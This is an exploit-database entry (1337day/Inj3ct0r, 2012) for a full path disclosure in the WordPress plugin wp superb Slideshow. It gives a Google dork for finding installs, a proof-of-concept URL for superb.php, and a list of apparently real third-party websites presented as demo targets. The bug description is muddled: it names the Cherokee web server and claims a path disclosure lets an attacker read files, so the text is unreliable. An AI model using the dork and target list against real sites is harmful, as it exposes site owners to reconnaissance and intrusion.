id: 19979
date: 12/15/2012
title: Wordpress Plugins - wp superb Slideshow Full Path Disclosure
author: T0x!c
cves: 

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm T0x!c member from Inj3ct0r Team                    1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
####
# Exploit Title: Wordpress Plugins - wp superb Slideshow Full Path Disclosure
# Author: T0x!c
# Date : 15/12/2012 
# Facebook Page: www.facebook.com/DzTem
# E-mail: Malik_99@hotmail.fr
# Category:: webapps
# Google Dork : inurl:"/wp-content/plugins/wp-superb-slideshow/"
# Link : http://wordpress.org/extend/plugins/wp-superb-slideshow/
# Plugins : http://downloads.wordpress.org/plugin/wp-superb-slideshow.zip
# Tested on: [Windows 7]/
####
# Greetings tO:|Ked'Ans|Caddy-dz|Kalashinkov3|W4hs0n|Black-ID|Agh!Las|Kha&Mix|Ev!LsCr!pT_Dz|KinG Of PiraTeS|

#!# Bug Info :
--------------
This bug is a remote 'Full Path Disclosure in Cherokee web server version 1.2.101
the attacker can use this bug for get Important information and Navigate between
files/folders of server and get the content.

#!# P0c #!#
->http://www.exemple.com/wordpress/wp-content/plugins/wp-superb-slideshow/superb.php

####
#Demo site:
#http://www.innovant.fr/wp-content/plugins/wp-superb-slideshow/superb.php
#http://www.trf6.com/wp-content/plugins/wp-superb-slideshow/superb.php
#http://gopalo.com/wp-content/plugins/shopp/core/model/schema.sql
#http://www.mondialan.fr/wp-content/plugins/wp-superb-slideshow/superb.php
#http://www.exceldis.com/wp-content/plugins/wp-superb-slideshow/superb.php
####

# - Special Thanks:
# ...:::' 1337day - Inj3ct0r TEAM ':::...

#  0day.today [2023-03-23]  #